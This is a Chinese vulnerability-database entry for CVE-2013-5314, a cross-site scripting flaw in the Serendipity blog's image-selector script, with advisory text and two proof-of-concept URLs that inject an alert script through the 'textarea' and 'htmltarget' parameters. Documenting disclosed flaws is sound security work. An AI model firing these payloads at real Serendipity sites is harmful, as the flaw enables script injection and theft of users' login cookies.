Serendipity serendipity_admin_image_selector.php脚本跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121756 漏洞类型 跨站脚本
发布时间 2013-07-12 更新时间 2013-08-20
CVE编号 CVE-2013-5314 CNNVD-ID CNNVD-201308-284
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/38642
https://www.securityfocus.com/bid/61138
https://cxsecurity.com/issue/WLB-2013070093
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201308-284
|漏洞详情
Serendipity是Serendipity团队开发的一套基于PHP的博客系统。该系统支持创建在线日记、博客、网页等。Serendipity1.6.2及之前的版本中的serendipity_admin_image_selector.php脚本中存在跨站脚本漏洞。远程攻击者可通过发送‘serendipity[htmltarget]’参数利用该漏洞注入任意Web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/61138/info

Serendipity is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Serendipity 1.6.2 is vulnerable; other versions may also be affected. 

http://www.example.com/serendipity_admin_image_selector.php?serendipity%5Btextarea%5D=%27%2Balert(0x000887)%2B%27&serendipity%5Baction%5D=208.100.0.117
&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117
&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117

http://www.example.com/serendipity_admin_image_selector.php?serendipity%5Bhtmltarget%5D=%27%2Balert(0x000A02)%2B%27&serendipity%5Baction%5D=208.100.0.117&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117
|受影响的产品
Serendipity Serendipity 1.6.2
|参考资料

来源:www.mavitunasecurity.com
链接:https://www.mavitunasecurity.com/xss-vulnerabilities-in-serendipity
来源:BUGTRAQ
名称:20130719Re:[Full-disclosure]XSSVulnerabilitiesinSerendipity
链接:http://archives.neohapsis.com/archives/bugtraq/2013-07/0135.html